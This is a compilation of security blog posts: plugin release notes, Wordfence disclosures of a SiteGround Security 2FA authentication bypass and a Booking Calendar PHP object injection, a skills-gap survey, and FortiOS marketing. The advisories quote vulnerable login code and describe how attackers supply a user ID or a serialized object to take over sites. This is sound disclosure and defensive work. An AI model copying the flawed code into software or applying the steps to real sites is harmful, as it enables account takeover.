Simply put, a must-use WordPress plugin is one that is automatically enabled and always loads when WordPress loads. These special plugins can’t be (easily) disabled and execute before all other plugins.

They’re installed in a different directory (/wp-content/mu-plugins/) instead of the default (/wp-content/plugins/).

So why would you want to switch Shield to be an MU plugin?

In much the same way as Shield offers the Security Admin module to protect against tampering, you could set Shield to be an MU plugin to prevent the plugin from being disabled accidentally or maliciously.

It’ll also ensure Shield executes before other plugins. While this won’t offer an advantage currently, we’ll soon adjust some of Shield’s code to block malicious requests much earlier in the WordPress load.

What actually happens when you enable MU Mode?

The core of the Shield plugin will remain in the normal installation directory- /wp-content/plugins/.

Shield will then create a new file in the MU directory that loads the normal Shield plugin. When this happens you’ll see 2x Shield plugins installed on your site.

How can you disable Shield after enabling MU Mode?

Once MU mode is enabled, you can’t disable the normal Shield plugin from the WordPress dashboard. This is normal WordPress behaviour.

However, you can simply revert the option within Shield’s settings to disable MU Mode, and then return to the plugins screen and disable Shield like any other plugin.

The setting for MU Mode is found within the Security Admin module and doesn’t require a Security Admin PIN to be set.

Shield’s MU Mode plugin option

#4 Better Detection Of Incorrect Application Passwords

Following a suggestion from a client and also off the back of our REST API work we’ve improved how Shield captures and logs authentication failures when Application Passwords are used.

Until now Shield wasn’t correctly spotting when these application password login attempts were failing. We’ve added some new events and logging and we’ll even increase the offense counter for an IP address when the event is triggered.

We spotted these new events being triggered almost immediately after we put them live for testing.

#5 More Quick Access Data In Admin Bar

Some time ago we added a top menu to the WordPress admin bar to help indicate when Shield found some scan items that warrant further investigation.

The original WP Admin Bar addition by Shield Security

After prompting for some extra information by a client, we’ve made some new helpful additions to the menu (see image below).

Shield’s Additional WP Admin Bar Items

Each of these additions provides helpful links to the item in question, for example:

  • Recently Blocked IPs and Offenses link to the IP Analyse Tool for the specific IP in question.
  • Recent Sessions links to the Shield Sessions table and the individual session item in the menu links to the profile of the given user.

    Source :
    https://getshieldsecurity.com/blog/wp-shield-security-pro-release-14-1/

Critical Authentication Bypass Vulnerability Patched in SiteGround Security Plugin

On March 10, 2022 the Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in “SiteGround Security”, a WordPress plugin that is installed on over 400,000 sites. This flaw makes it possible for attackers to gain administrative user access on vulnerable sites when two-factor authentication (2FA) is enabled but not yet configured for an administrator.

Wordfence Premium, Wordfence Care, and Wordfence Response received a set of firewall rules on March 10, 2022 to provide protection against any attackers trying to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on April 9, 2022.

After sending the full disclosure details to the SiteGround security team on March 10, 2022 a patch was released the next day on March 11, 2022. While the plugin was partially patched immediately, it wasn’t optimally patched until April 7, 2022.

Sites hosted on the SiteGround platform have automatically been updated to the patched version while those hosted elsewhere will require a manual update, if auto-updates are not enabled for the plugin. We strongly recommend ensuring that your site has been updated to the latest patched version of “SiteGround Security”, which is version 1.2.6 at the time of this publication.


Description: Authentication Bypass via 2-Factor Authentication Setup
Affected Plugin: SiteGround Security
Plugin Slug: sg-security
Plugin Developer: SiteGround
Affected Versions: <= 1.2.5
CVE ID: CVE-2022-0992
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Chloe Chamberland
Fully Patched Version: 1.2.6

SiteGround Security is a plugin designed to enhance the security of WordPress installations via several features like login security including 2FA, general WordPress hardening, activity monitoring, and more. It’s also worth noting that it comes pre-installed on all SiteGround hosted WordPress sites. Unfortunately, the 2FA functionality of the plugin was insecurely implemented making it possible for unauthenticated attackers to gain access to privileged accounts.

When two-factor authentication is enabled, it requires all administrative and editor users to set-up two factor authentication. This requirement is triggered when the site’s administrative and editor users log into the site for the first time after 2FA has been enabled at which time they are prompted to configure 2FA for their account. This means that there will be a period of time between 2FA being enabled on a site and each user configuring it for the account.

During this interim period, attackers could hijack the 2FA set-up process. The plugin had a flaw that made it so that attackers could completely bypass the first step of authentication, which requires a username and password, and access the 2FA set-up page for users that had not configured 2FA yet.

It was as simple as supplying the user ID they would like to compromise via the sg-user-id parameter, along with a few other parameters to indicate that they would like to trigger the initial 2FA configuration process.

The following validate_2fa_login() function shows the process by which a user-supplied ID is validated. If the result from the check_authentication_code() function was false and the sg_security_2fa_configured user meta was 0, which indicated that 2FA hadn’t yet been configured for that user, then the plugin would load the 2fa-initial-setup-form.php template, which displays the QR code and 2FA secret needed to configure the authenticator app for the user-supplied ID.

```php
public function validate_2fa_login( $user ) {
   // Bail if there is no valid user authentication.
   if ( ! isset( $_POST['sg-user-id'] ) ) { // phpcs:ignore
      return;
   }

   $result = $this->check_authentication_code( wp_unslash( $_POST['sgc2facode'] ), wp_unslash( $_POST['sg-user-id'] ) ); // phpcs:ignore

   // Check the result of the authtication.
   if ( false === $result ) {
      if ( 0 == get_user_meta( $_POST['sg-user-id'], 'sg_security_2fa_configured', true ) ) { // phpcs:ignore
         // Arguments for initial 2fa setup.
         $args = array(
            'template' => '2fa-initial-setup-form.php',
            'qr'       => get_user_meta( $_POST['sg-user-id'], 'sg_security_2fa_qr', true ), // phpcs:ignore
            'secret'   => get_user_meta( $_POST['sg-user-id'], 'sg_security_2fa_secret', true ), // phpcs:ignore
            'error'    => esc_html__( 'Invalid verification code!', 'sg-security' ),
            'action'   => esc_url( add_query_arg( 'action', 'sgs2fa', wp_login_url() ) ),
         );
      } else {
         // Arguments for 2fa login.
         $args = array(
            'template' => '2fa-login.php',
            'error'    => esc_html__( 'Invalid verification code!', 'sg-security' ),
            'action'   => esc_url( add_query_arg( 'action', 'sgs2fa', wp_login_url() ) ),
         );
      }

      $this->load_form( wp_unslash( $_POST['sg-user-id'] ), $args ); // phpcs:ignore
   }

   // Set the auth cookie.
   wp_set_auth_cookie( wp_unslash( $_POST['sg-user-id'] ), intval( wp_unslash( $_POST['rememberme'] ) ) ); // phpcs:ignore
```

The authentication QR code and secret key that would be displayed to potentially unauthorized users.

The returned QR code and secret key are the only things needed to connect the user account with an authentication mechanism, such as Google Authenticator. Attackers were able to use this to connect their authentication app with the account and successfully use a code to pass the “second factor of authentication.” This function would then set the user authentication cookies via the wp_set_auth_cookie() function using the user supplied ID from the sg-user-id parameter which effectively logs the attacker in as that user. Due to the default configuration of the plugin, this account would most likely be a privileged user like an administrator or editor. It’s also worth noting that the function returns the back-up codes which could be used via the weakness outlined in the next section.

To sum it up, there was no validation on the validate_2fa_login() function that the identity a user was claiming was in fact legitimate. As such attackers could bypass the first authentication mechanism, a username/password pair, which is meant to prove identity and successfully log in, due to a weakness in the second authentication mechanism, the 2FA process. When successful, an attacker could completely infect a site by exploiting this vulnerability.


Description: Authorization Weakness to Authentication Bypass via 2-Factor Authentication Back-up Codes
Affected Plugin: SiteGround Security
Plugin Slug: sg-security
Plugin Developer: SiteGround
Affected Versions: <= 1.2.4
CVE ID: CVE-2022-0993
CVSS Score: 8.1 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Chloe Chamberland
Fully Patched Version: 1.2.6

In addition to the above outlined vulnerability, the method in which 2FA back-up code authentication was handled made it possible for attackers to log in if they were able to brute force a back-up code for a user or compromise it via other means such as SQL Injection.

Diving deeper, the plugin registered the validate_2fabc_login() function which validated the supplied backup code through the validate_backup_login() function using the user supplied user ID from the sg-user-id parameter along with the back-up code supplied via the sgc2fabackupcode parameter. If the back-up code was found in the array of stored back-up codes for that user, then the function would use the wp_set_auth_cookie() function to set the authentication cookies for the supplied user ID. If that user ID belonged to an administrator, the attacker would effectively be logged in as an administrator.

```php
public function validate_2fabc_login() {

   $result = $this->validate_backup_login( wp_unslash( $_POST['sgc2fabackupcode'] ), wp_unslash( $_POST['sg-user-id'] ) ); // phpcs:ignore

   // Check the result of the authtication.
   if ( false === $result ) {
      $this->load_form(
         wp_unslash( $_POST['sg-user-id'] ), // phpcs:ignore
         array(
            'template' => '2fa-login-backup-code.php',
            'action'   => esc_url( add_query_arg( 'action', 'sgs2fabc', wp_login_url() ) ),
            'error'    => esc_html__( 'Invalid backup code!', 'sg-security' ),
         )
      );
   }

   // Set the auth cookie.
   wp_set_auth_cookie( wp_unslash( $_POST['sg-user-id'] ), intval( wp_unslash( $_POST['rememberme'] ) ) ); // phpcs:ignore
```

Similarly to the previous vulnerability, the issue here is that there was no true identity validation for the authentication, which indicates an authorization weakness. The function performed no checks to verify that a user had previously authenticated prior to entering the 2FA back-up code, and as such they did not need to legitimately log in prior to being logged in while using a back-up code. This meant that there were no checks to validate that a user was authorized to use a back-up code to perform the second factor of authentication that would log them in.

Though the risk in this case is lower, the backup codes were 8 digits long and entirely numeric, so an attacker could potentially brute force one of the 8 back-up codes and automatically be logged in without knowing a username and password combination for an administrative user.

While this might not be practical to attempt on most servers, a patient adversary attacking a well-provisioned server capable of processing a large number of requests at once would have a high chance of eventually gaining access unless the brute force attempts were stopped by another mechanism, such as the Wordfence plugin’s built-in brute force protection or rate limiting rules.

Further, this vulnerability could be used in conjunction with another vulnerability, such as SQL injection, where an attacker would be able to compromise the 2FA back-up codes that are stored in the database and then subsequently use them to log in without needing to crack the password of an administrative user which would likely be significantly stronger. In both cases, the impact would be significant as an attacker could gain administrative access to the compromised WordPress site which could be used for complete site infection.
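Both weaknesses above come from taking the user's identity from the sg-user-id request parameter during the second step. The following added example (not SiteGround's patch and not code from the original post) shows one way to bind the second-factor step to server-side state that is created only after the password check and that also bounds back-up code guesses; the same gate would apply before showing a 2FA setup form. The names PendingLoginStore, verify_backup_code_step, pending_token and backup_code are hypothetical, and the code is plain PHP 7.4+ with no WordPress dependency.

```php
<?php
declare(strict_types=1);

// Added illustration, not SiteGround's patch. All names here are hypothetical.
final class PendingLoginStore
{
    /** @var array<string, array{user_id: int, expires: int, failures: int}> */
    private array $pending = [];
    private int $ttl;
    private int $maxFailures;

    public function __construct(int $ttl = 300, int $maxFailures = 5)
    {
        $this->ttl = $ttl;
        $this->maxFailures = $maxFailures;
    }

    // Call this only after the username/password check has succeeded.
    public function issue(int $userId, int $now): string
    {
        $token = bin2hex(random_bytes(32));
        // Keep only a hash of the token, keyed to the verified user.
        $this->pending[hash('sha256', $token)] = [
            'user_id' => $userId,
            'expires' => $now + $this->ttl,
            'failures' => 0,
        ];
        return $token;
    }

    // Map a token back to the user who passed step one, or null.
    public function resolve(string $token, int $now): ?int
    {
        $key = hash('sha256', $token);
        if (!isset($this->pending[$key])) {
            return null;
        }
        $entry = $this->pending[$key];
        if ($now > $entry['expires'] || $entry['failures'] >= $this->maxFailures) {
            unset($this->pending[$key]); // expired or locked out: log in again
            return null;
        }
        return $entry['user_id'];
    }

    public function recordFailure(string $token): void
    {
        $key = hash('sha256', $token);
        if (isset($this->pending[$key])) {
            $this->pending[$key]['failures']++;
        }
    }

    public function consume(string $token): void
    {
        unset($this->pending[hash('sha256', $token)]);
    }
}

/**
 * Backup-code step. Returns the user ID to log in, or null.
 * $backupHashes maps user ID => password_hash() values of single-use codes.
 */
function verify_backup_code_step(PendingLoginStore $store, array $post, array &$backupHashes, int $now): ?int
{
    $token = is_string($post['pending_token'] ?? null) ? $post['pending_token'] : '';
    $code = is_string($post['backup_code'] ?? null) ? $post['backup_code'] : '';
    // Identity comes from server-side state, never from a request parameter.
    $userId = $store->resolve($token, $now);
    if ($userId === null) {
        return null; // no setup form is shown and no cookie is set
    }
    foreach ($backupHashes[$userId] ?? [] as $i => $hash) {
        if (password_verify($code, $hash)) {
            unset($backupHashes[$userId][$i]); // codes are single use
            $store->consume($token);
            return $userId; // the caller sets the auth cookie for this ID only
        }
    }
    $store->recordFailure($token); // bounded guesses per password login
    return null;
}

// Constructed sample data: user 1 is an administrator with one backup code.
$store = new PendingLoginStore();
$backupHashes = [1 => [password_hash('48151623', PASSWORD_DEFAULT)]];
$now = 1700000000;

// A request that names a user ID but carries no token proves nothing.
var_dump(verify_backup_code_step($store, ['sg-user-id' => '1', 'backup_code' => '48151623'], $backupHashes, $now));

// After a successful password check the server issues a token for user 1.
$token = $store->issue(1, $now);
var_dump(verify_backup_code_step($store, ['pending_token' => $token, 'backup_code' => '00000000'], $backupHashes, $now));
var_dump(verify_backup_code_step($store, ['pending_token' => $token, 'backup_code' => '48151623'], $backupHashes, $now));

// The token and the code are both spent, so replaying the request fails.
var_dump(verify_backup_code_step($store, ['pending_token' => $token, 'backup_code' => '48151623'], $backupHashes, $now));
```

Only the third call returns the user ID; the request without a token, the wrong code and the replay all return null.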

An Important Security Reminder: Audit Your WordPress Site’s User Accounts

This vulnerability serves as an important reminder to audit your WordPress site’s user accounts. This means identifying any old and unused user accounts that have been inactive for an extended period of time and/or are likely to never be used again and removing them or completely stripping the user’s capabilities. This vulnerability could easily be exploited on sites where the site owner enabled 2FA, which is required for all administrative and editor users, and had old inactive administrative/editor user accounts on the site that an attacker could target. Considering accounts that are no longer active are unlikely to log in after the 2FA setting has been enabled, the 2FA for those accounts would not be configured leaving the site ripe for exploitation by any attackers exploiting the vulnerability.

A situation involving a similar security issue involving insecure 2FA was reported by the CISA in conjunction with the FBI a few weeks ago, around the same time we discovered this vulnerability. In the Cybersecurity Advisory (CSA) by the CISA, it was disclosed that a threat actor was able to successfully brute force a dormant user’s account credentials, and due to a default 2FA setting that would allow dormant users to re-enroll a new device for 2FA during the next active log in, the threat actor was able to connect the 2FA secret to their own account and retrieve the code needed to pass the second factor of authentication. Once the threat actor gained initial access to the system they were able to escalate their privileges by exploiting the “PrintNightmare” vulnerability, which you can read more about here, and steal sensitive information from across the organization’s network. This goes to show that attackers are definitely looking for flaws like the one disclosed today to exploit and any site can be a target. As such, it’s important to actively maintain and validate the security of your site through regularly performed professional or self-conducted security audits and penetration tests, which is a service Wordfence provides. Security is an active and continuous process.

Timeline

March 10, 2022 – Conclusion of the plugin analysis that led to the discovery of two Authentication Bypass Vulnerabilities in the “SiteGround Security” WordPress plugin. We deploy firewall rules to protect Wordfence Premium, Wordfence Care, and Wordfence Response users. We send the full disclosure details to SiteGround in accordance with their responsible disclosure policy.
March 11, 2022 – The CTO of SiteGround responds indicating that a patch has been released. We review the patch and inform them that it is insufficient. They release an additional patch.
March 11, 2022 – A patched version of the plugin is released as version 1.2.3. We suggest further security enhancements to the functionality.
March 16, 2022 – An update is made that reduces the security of the 2FA functionality, we follow-up again to suggest better security enhancements to the functionality. The CTO assures us that they are working on it.
April 6, 2022 – A fully and optimally patched version of the plugin is released as version 1.2.6.
April 9, 2022 – Wordfence Free users receive the firewall rules.

Conclusion

In today’s post, we detailed a flaw in the “SiteGround Security” plugin that made it possible for unauthenticated attackers to gain access to administrative user accounts in instances where 2-Factor Authentication was enabled, though not yet fully set up, and in cases where an attacker could successfully brute force a back-up code. This could easily be used by an attacker to completely compromise a site. This flaw has been fully patched in version 1.2.6.

We strongly recommend ensuring that your site has been updated to the latest patched version of “SiteGround Security”, which is version 1.2.6 at the time of this publication.

Wordfence Premium, Wordfence Care, and Wordfence Response received a set of firewall rules on March 10, 2022 to provide protection against attempts by attackers to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on April 9, 2022.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both Wordfence Care and Wordfence Response include hands-on security support that provide you with ongoing assistance from our incident response team, should you need it.

Special thanks to the team at SiteGround, for responding swiftly and working quickly to get a patch out to protect their customers and working to further secure the 2FA component. 

Source :
https://www.wordfence.com/blog/2022/04/critical-authentication-bypass-vulnerability-patched-in-siteground-security-plugin/

PHP Object Injection Vulnerability in Booking Calendar Plugin

On April 18, 2022, the Wordfence Threat Intelligence team initiated the responsible disclosure process for an Object Injection vulnerability in the Booking Calendar plugin for WordPress, which has over 60,000 installations.

We received a response the same day and sent over our full disclosure early the next day, on April 19, 2022. A patched version of the plugin, 9.1.1, was released on April 21, 2022.

We released a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers on April 18, 2022. Sites still running the free version of Wordfence will receive the same protection on May 18, 2022. We recommend that all Wordfence users update to the patched version, 9.1.1, as soon as possible as this will entirely eliminate the vulnerability.


Description: Insecure Deserialization/PHP Object Injection
Affected Plugin: Booking Calendar
Plugin Slug: booking
Plugin Developer: wpdevelop, oplugins
Affected Versions: <= 9.1
CVE ID: CVE-2022-1463
CVSS Score: 8.1 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Ramuel Gall
Fully Patched Version: 9.1.1

The Booking Calendar plugin allows site owners to add a booking system to their site, which includes the ability to publish a flexible timeline showing existing bookings and openings using a shortcode, [bookingflextimeline].

The flexible timeline includes the ability to configure viewing preferences and options when viewing the published timeline. Some of these options were passed in PHP’s serialized data format, and unserialized by the define_request_view_params_from_params function in core/timeline/v2/wpbc-class-timeline_v2.php.

An attacker could control the serialized data via several methods:

  1. If a timeline was published, an unauthenticated attacker could obtain the nonce required to send an AJAX request with the action set to WPBC_FLEXTIMELINE_NAV and a timeline_obj[options] parameter set to a serialized PHP object.
  2. Any authenticated attacker could use the built-in parse-media-shortcode AJAX action to execute the [bookingflextimeline] shortcode, adding an options attribute in the shortcode set to a serialized PHP object. This would work even on sites without a published timeline.
  3. An attacker with contributor-level privileges or above could also embed the [bookingflextimeline] shortcode containing a malicious options attribute into a post and execute it by previewing it, or obtain the WPBC_FLEXTIMELINE_NAV nonce by previewing the [bookingflextimeline] shortcode and then using method #1.

Any time an attacker can control data that is unserialized by PHP, they can inject a PHP object with properties of their choice. If a “POP Chain” is also present, it can allow an attacker to execute arbitrary code, delete files, or otherwise destroy or gain control of a vulnerable website. Fortunately, no POP chain was present in the Booking plugin, so an attacker would require some luck as well as additional research in order to exploit this vulnerability. Nonetheless, POP chains appear in a number of popular software libraries, so many sites could still be exploited if another plugin using one of these libraries is installed.

Despite the lack of a POP chain and the complexity involved in exploitation, the potential consequences of a successful attack are so severe that object injection vulnerabilities still warrant a “High” CVSS score. We’ve written about Object Injection vulnerabilities in the past if you’d like to find out more about how they work.
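The defensive counterpart to the issue described above is to decode request-controlled options without ever instantiating a class. The following is an added example, not the Booking Calendar patch or code from the original post; the function names are hypothetical, the assumption that the options form a flat map of scalar settings is ours, and the inputs are constructed.

```php
<?php
declare(strict_types=1);

// Added illustration, not the Booking Calendar patch. Function names are
// hypothetical; the flat map of scalar settings is an assumed option shape.

/** Accept only an array whose values are scalars or null. */
function flat_scalar_array($value): ?array
{
    if (!is_array($value)) {
        return null;
    }
    foreach ($value as $item) {
        if ($item !== null && !is_scalar($item)) {
            return null; // nested arrays and objects are refused
        }
    }
    return $value;
}

/** Legacy format: PHP-serialized text, decoded without instantiating any class. */
function decode_options_serialized(string $raw): ?array
{
    // With allowed_classes => false every object becomes __PHP_Incomplete_Class,
    // so no __wakeup() or __destruct() of a loaded class can run.
    $value = @unserialize($raw, ['allowed_classes' => false]);
    return flat_scalar_array($value);
}

/** Preferred format: JSON, which cannot describe a PHP object at all. */
function decode_options_json(string $raw): ?array
{
    return flat_scalar_array(json_decode($raw, true));
}

// Constructed inputs: one legitimate option set and two that carry an object.
$legit = serialize(['view_days' => 30, 'resource' => 'room-1']);
$object = 'O:8:"stdClass":0:{}';
$nested = 'a:1:{s:1:"x";O:8:"stdClass":0:{}}';

var_dump(decode_options_serialized($legit));
var_dump(decode_options_serialized($object));
var_dump(decode_options_serialized($nested));
var_dump(decode_options_json('{"view_days":30,"resource":"room-1"}'));
```

The two inputs that contain a serialized object are rejected, while the same settings pass in either format.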

Timeline

April 18, 2022 – We release a firewall rule to protect Wordfence Premium, Care, and Response customers. We initiate the disclosure process. The plugin developer verifies the contact method.
April 19, 2022 – We send the full disclosure to the plugin developer.
April 21, 2022 – A patched version of the Booking Calendar plugin, 9.1.1, is released.
May 18, 2022 – The firewall rule becomes available to free Wordfence users.

Conclusion

In today’s post, we covered an Object Injection vulnerability in the Booking Calendar plugin. Wordfence Premium, Wordfence Care, and Wordfence Response customers are fully protected from this vulnerability. Sites running the free version of Wordfence will receive the same protection on May 18, 2022, but have the option of updating the Booking calendar plugin to the patched version 9.1.1 to eliminate the risk immediately.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

Source :
https://www.wordfence.com/blog/2022/04/php-object-injection-in-booking-calendar-plugin/

Top 5 Findings from the Global 2022 Cybersecurity Skills Gap Report

Closing the cybersecurity skills gap has been a topic of interest for a number of years with many organizations reporting on its slow decline. According to (ISC)2’s 2021 Cyber Workforce Report, the global cybersecurity workforce needs to grow 65 percent to effectively defend organizations’ critical assets. While the number of professionals needed to fill the gap has decreased from 3.12 million down to 2.72 million in the past year, this is still a significant void that leaves organizations vulnerable.

There is a lot to be learned from the skills gap. Today, Fortinet released the 2022 Cybersecurity Skills Gap Global Research Report that uncovers the impact the skills gap is having on organizations around the world. From the survey’s findings, five top themes have emerged:

  1. Cybersecurity affects every organization
  2. Recruitment and retention of talent is a problem
  3. Organizations are looking for individuals with certified skills
  4. Organizations are looking for more diversity
  5. Raising cybersecurity awareness remains a key challenge

The survey was conducted in January and February of 2022 and included more than 1200 IT and cybersecurity decision-makers from 29 different locations. There was an even split between the respondents in four regions: North America, EMEA, APAC and LATAM.

How Cybersecurity and the Skills Gap Affects Every Organization

A staggering 80% of organizations experienced at least one breach during the last 12 months that they could attribute to a lack of cybersecurity skills and/or awareness. Almost 20% suffered five or more breaches.

[Bar graph: Number of breaches in the last 12 months]

If that weren’t enough, 64% of organizations experienced breaches that resulted in lost revenue and/or cost them fines. Of those, 38% reported breaches that cost them more than a million dollars (USD).

How is the Skills Gap Creating Cyber Risk?

According to the survey respondents, a key factor contributing to the breaches is that organizations struggle to find and retain certified cybersecurity people. 67% of global leader respondents indicate that the skills shortage creates additional cyber risks for their organization.

Recruitment and Retention Are Key Challenges Causing the Skills Gap

Organizations need qualified cybersecurity professionals now more than ever, which is why 76% of organizations indicate that their board of directors now recommend increases in IT and cybersecurity headcount.

[Pie graph: Board members who recommend increases in IT and cybersecurity headcount]

Most would hope that increasing hiring could be an easy fix to this problem, however, 60% of organizations indicated that they struggle to recruit cybersecurity talent and 52% struggle to retain it.

Another key challenge for recruitment is that organizations need to hire people for a broad range of security and IT network-related roles and specializations. Cloud security specialists and security operations (SOC) analysts remain among the most sought-after roles in cybersecurity, followed closely by security administrators and architects. But organizations aren’t just looking to ramp up hires arbitrarily. They’re deliberately trying to build teams of specialized talent who are equipped to handle an increasingly complex threat landscape.

Finding Qualified People is a Challenge for the Skills Gap

Globally, 50% of organizations seek cloud security specialists, a priority that’s likely informed by how rapidly companies moved their operations to the cloud during the pandemic.

The challenge is finding the right people.

[Graph: What roles are organizations looking for?]

What Skills Are Needed to Work in Cybersecurity? 

Central to the challenge of recruiting and retaining cybersecurity talent is the importance of certification. Certified professionals are universally sought after with 95% of decision-makers sharing that technology-focused certifications positively impact both their role and their team. 

Organizations Are Looking for Certified Skills

As such, 81% of leaders prefer to hire people with certifications.

However, 78% indicate it’s hard to find certified people. This may contribute to the fact that globally 91% of organizations say they are willing to pay for an employee to achieve a cybersecurity certification.

Figure: Organizations would pay for an employee to get a cybersecurity certification

The preference to hire certified people may be because organization leaders followed that same path themselves:

  • 86% of decision-makers report having earned technology-focused certifications
  • 88% report having other people with certificates on their team

Certification is an Opportunity Given the Skills Gap

As noted above, global leaders identified the struggle to find and retain certified cybersecurity people as a key factor contributing to breaches. This may also influence an organization’s hiring strategy, with a tendency to lean towards professionals whose certifications correspond to the positions being filled.

Closing the Cybersecurity Skills Gap by Prioritizing Diversity

The challenge isn’t just hiring more people, but also building more capable and more diverse teams. While enterprises need qualified talent for a range of different roles, 89% of global companies also have explicit diversity goals as part of their hiring plan.

7 out of 10 leaders worldwide say hiring women and new graduates are among their top three challenges. 61% say hiring minorities is also a top three challenge.

Despite the challenges, or perhaps because of them, three out of four organizations implemented formal processes to hire more women, and nine out of 10 actively engaged women and new graduates during the last three years. 59% of companies have structures in place to hire minorities, and 51% for hiring more veterans.

Figure: Hiring from these populations is a top three challenge for organizations

Raising Cybersecurity Awareness to Close the Skills Gap

Even though the recruitment, retention, and certification of a cybersecurity team is vital, companies cannot realistically protect themselves until they also raise the cyber awareness of all employees. That requires ensuring that all employees, at all levels and all roles within the organization, have the knowledge and awareness to protect themselves and their organization’s data. Until they do, breaches will always be likely.

87% of organizations implemented a training program to increase cyber awareness. However, 52% of leaders continue to believe their employees still lack the necessary knowledge. This raises the question of the effectiveness of the programs that organizations currently have in place.

Figure: Employees lack knowledge when it comes to cybersecurity awareness (52% agreed, 48% disagreed)

For those that don’t have a program in place, 66% report they are currently looking for a program that would suit their needs. 

The Power of People Can Help Close the Skills Gap

Cybersecurity can sometimes feel like a purely technological domain. But when you look past the technology that organizations rely on, cybersecurity is all about how well your employees work together to protect the organization.

Fortunately, organizations are making deliberate efforts to improve on all these fronts. However, it is imperative to remember that the cyber battle isn’t won on any one front. Cybersecurity requires an entire system of people and technology working together to protect an organization.

That starts with people who are empowered, qualified, and certified to protect the organization.

Source :
https://www.fortinet.com/blog/industry-trends/global-cybersecurity-skills-gap-report-findings

FortiOS 7.2: Enhancing the Only Converged Networking and Security Platform Available Today

The Fortinet Security Fabric is the industry’s first—and only—platform to converge essential networking and security functions and consolidate security point products into a unified platform. And now, Fortinet has announced the release of FortiOS 7.2, which widens that leadership position even further. With over 300 new features spanning the Fortinet portfolio—including new advanced AI-powered services that accelerate the detection and response to threats—FortiOS is better positioned than ever to secure the hybrid networks that organizations rely on to compete in today’s digital marketplace.

Today’s Network Is Different, Not Dead

Too many organizations hear that everything is moving to the cloud. And that as a result, the traditional network will soon be dead. But nothing could be further from the truth. And worse, buying into that myth is putting organizations at risk.

Of course, networks are vastly different from just a few years ago. Digital acceleration has enabled users and devices to access critical resources from any location, fundamentally changing how businesses operate. But this need for consistent user experience does not require them to abandon their networks. Instead, organizations worldwide and across all industries are building hybrid networks that interconnect traditional data centers and campuses with multi-cloud infrastructures, SaaS platforms, branch offices, home offices, and mobile users and devices.

Brandon Butler, a Senior Research Analyst at IDC, recently stated, “The network is foundational for enabling secure, scalable, and efficient use of cloud, edge, and IoT applications.” So, rather than dying, hybrid networks are the enablers of digital acceleration. They allow applications and workflows to move seamlessly from end to end and be accessed by any user or device from any location.

However, organizations need to stop thinking about networking and security as separate strategies to do this effectively. Instead, securing their digital acceleration efforts requires infrastructure and security teams to converge their visions. As applications continue their cloud journey and devices become increasingly visible to everyone, secure networks are vital to connecting these domains.

But to do this, enterprises, small businesses, and service providers alike need to replace isolated point devices that only address a portion of the network with solutions designed to operate as part of an integrated fabric that can see and adapt to the broader network. As network edges and dynamic infrastructures evolve, single-purpose and isolated security solutions only make it more difficult for organizations to deploy and maintain a cohesive and comprehensive security strategy. Instead, organizations must adopt a platform approach that converges operational efficiency and security automation with the underlying network.

The Only Platform Designed to Fully Protect Today’s Hybrid Networks

The Fortinet Security Fabric is the only platform designed to fully protect and dynamically adapt to today’s hybrid networks at any edge, and FortiOS 7.2 is the heart of that platform. FortiOS enables organizations to deploy the Fortinet Security Fabric to every edge, allowing security to dynamically scale and adapt as the network evolves. This expansive, integrated approach also enables the delivery of AI-powered automation that correlates intelligence from across the network and global threat feeds to rapidly detect even the most sophisticated threats and respond in real time.

FortiOS 7.2 enhances the Security Fabric’s award-winning functions and services by extending the definition of what’s possible in networking and security, thereby enabling customers and partners to safely and effectively compete in today’s digital marketplace. And for the foreseeable future, those businesses will rely on hybrid networks. But only by integrating security at the core of those networks will they be able to adapt at speed and scale to secure every edge. Over 20 years of prioritizing research and development have positioned Fortinet as the driving force behind cybersecurity innovation. With FortiOS 7.2, Fortinet is setting new industry standards for converged networking and security.

Figure 1. Fortinet’s Security Fabric platform converges essential networking and security functions and consolidates security point products into a unified platform

High-performance AI-powered threat intelligence and services 

New AI-powered FortiGuard Security Services enable organizations to automate their security systems to stay ahead of never-before-seen attacks, in real-time.  And one of the most significant enhancements is the speed and accuracy with which FortiOS 7.2 can detect and prevent threats, in a coordinated way across an organization’s extended attack surface.

Traditionally, performance-intensive activities like sandboxing suspicious files for out-of-band inspection resulted in a delay in delivering content or having to hunt down malware inside the network when a file turns out to be infected. FortiOS 7.2’s new inline sandbox service resolves this by transforming a traditional detection sandbox capability into real-time in-network prevention to stop both known and unknown malware, with minimal impact on operations. New inline CASB, dedicated IPS, advanced device protection for OT and IoT systems, and additional enhancements to our SOC services portfolio deliver advanced security services to improve our customers’ security postures. Because they are consumed as a service across the Fortinet Security Fabric and ecosystem, this guarantees real-time proactive updates with minimal impact to operations and simplified scaling. Additionally, our new outbreak detection service provides a faster response to outbreak attacks, including immediate alerts and threat hunting scripts that automatically identify and respond to new threats. In addition, all FortiGuard services are powered by trusted machine learning and artificial intelligence. Its accuracy and fidelity are further enhanced through FortiGuard Labs’ analysis of over 100 billion global security events a day observed in live production environments worldwide. 

The critical convergence of networking and security 

One of the most essential functions of a modern security solution is its ability to scale, span, and adapt to a continuously evolving hybrid network. Achieving this requires converging security with the network. Such convergence allows security systems to seamlessly adapt to network changes as it addresses continually evolving requirements. However, the challenge most organizations face is that few security solutions are genuinely able to provide this essential function.

Fortinet’s security-driven network approach was the first platform-based strategy to encompass the entire network development and deployment life cycle. Converging essential network and security functions ensures that security is the central consideration for all business-driven infrastructure decisions. As a result, new edges, applications, and services that expand your attack surface are automatically protected.

